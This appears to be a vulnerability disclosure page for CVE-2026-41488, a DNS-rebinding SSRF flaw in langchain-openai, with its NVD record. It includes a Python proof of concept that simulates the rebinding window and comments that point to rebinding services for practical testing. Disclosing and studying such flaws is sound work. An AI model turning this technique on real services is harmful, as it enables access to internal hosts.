CVE-2026-41488

# This PoC demonstrates the vulnerable logic flow. # An attacker would need a controlled domain (e.g., via rebind.net) # that resolves to a public IP first, then 127.0.0.1. import socket import time def simulate_vulnerable_flow(hostname): # Step 1: Validation (Check) print(f"[+] Validating hostname: {hostname}") try: # First DNS resolution (Expected Public IP) ip_check = socket.gethostbyname(hostname) print(f"[+] Validation IP: {ip_check}") # Simulate SSRF check logic (simplified) if ip_check.startswith("127.") or ip_check.startswith("192.168.") or ip_check == "::1": print("[-] SSRF Detected: Blocking private IP during validation.") return except socket.gaierror: print("[-] Resolution failed.") return # TOCTOU Window: Attacker changes DNS record here print("[*] TOCTOU Window: Waiting for DNS rebinding...") time.sleep(2) # Step 2: Fetch (Use) # Second DNS resolution (Attacker switches to Localhost) print(f"[*] Fetching resource from: {hostname}") try: ip_fetch = socket.gethostbyname(hostname) print(f"[+] Fetch IP: {ip_fetch}") # Vulnerability: Request goes to the new IP without re-validation if ip_fetch.startswith("127."): print("[!] EXPLOIT SUCCESSFUL: Request sent to localhost (Internal IP)!") else: print("[!] Exploit failed: IP did not rebind to target.") except socket.gaierror: print("[-] Resolution failed.") # Note: To test this practically, replace 'attacker.com' with a domain # configured to rebind (e.g., using a service like rbndr.us). # simulate_vulnerable_flow("attacker.com")

{"cve": {"id": "CVE-2026-41488", "sourceIdentifier": "[email protected]", "published": "2026-04-24T21:16:19.637", "lastModified": "2026-04-28T18:17:09.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangChain is a framework for building agents and LLM-powered applications. Prior to 1.1.14, langchain-openai's _url_to_size() helper (used by get_num_tokens_from_messages for image token counting) validated URLs for SSRF protection and then fetched them in a separate network operation with independent DNS resolution. This left a TOCTOU / DNS rebinding window: an attacker-controlled hostname could resolve to a public IP during validation and then to a private/localhost IP during the actual fetch."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langchain-openai:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.14", "matchCriteriaId": "8089EE72-7257-4263-BF4E-8B429B2C0002"}]}]}], "references": [{"url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-r7w7-9xr2-qq2r", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}